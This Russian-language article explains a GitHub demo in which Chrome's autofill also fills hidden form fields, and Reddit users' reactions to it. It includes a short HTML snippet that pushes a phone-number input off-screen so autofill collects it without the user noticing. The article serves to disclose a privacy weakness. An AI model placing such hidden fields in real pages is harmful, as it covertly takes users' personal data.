(adsbygoogle = window.adsbygoogle || []).push({}); Недавно на Github появилась интересная демка, состоящая всего из всего одной страницы. Она показывает, как можно украсть данные пользователя, злоупотребляя возможностями браузера.

Схема работы очень проста — в Google Chrome существует возможность автоматически заполнить поля ввода, которая работает, даже если вы находитесь на сайте первый раз. Зайдя на сайт пользователь может захотеть заполнить автоматически видимые поля — например имя и электронный адрес. Однако, если владелец сайта разместит невидимые поля ввода, то они так же буду заполнены.

<code><p>
        //Это поле пользователь видит
        <input id="name" name="name" type="text" placeholder="Your Name">
</p>
<p>
        //И это видит
        <input id="email" name="email" type="email" placeholder="Your Email">
</p>
<p style="margin-left:-500px">
        //А вот это уже не видит
        <input id="phone" name="phone" type="text" placeholder="Your Phone">
</p>
<p>
        //По нажатию этой кнопки будут отправлены все данные, включая телефон
        <input type="submit" value="Submit">
</p></code>
Anttiviljami (пользователь Github, который выложил демонстрационную страничку) пишет и про взаимодействие других браузеров с такой страницей. Так, в Firefox необходимо заполнять все поля по отдельности, а Safari сперва покажет пользователю список данных, которые подставляются в формы. Сама страница с демонстрацией уязвимости доступна на Github Pages. После нажатия кнопки Submit вам будут показаны данные, которые были бы переданы владельцу сайта.

Эта возможность вызвала резонанс у пользователей reddit. Большинство сочло такое поведение браузера не очевидным и очень даже опасным. Пользователь с ником Terr прокомментировал ето так:

Даже если бы браузер проверял со 100% точностью, что форма ввода не скрыта/перекрыта другой формой/замаскирована, проблема бы не ушла. Атакующий всё ещё имеет возможность разместить небольшое поле ввода там, где какая-то часть пользователей его не заметит.
Я не понимаю — что должен делать пользователь, чтобы регулярно посещать незнакомые вебсайты и на всех заполнять множество форм с адресом, телефоном и электронной почтой? Зачем эта возможность вообще нужна?
Читать дальше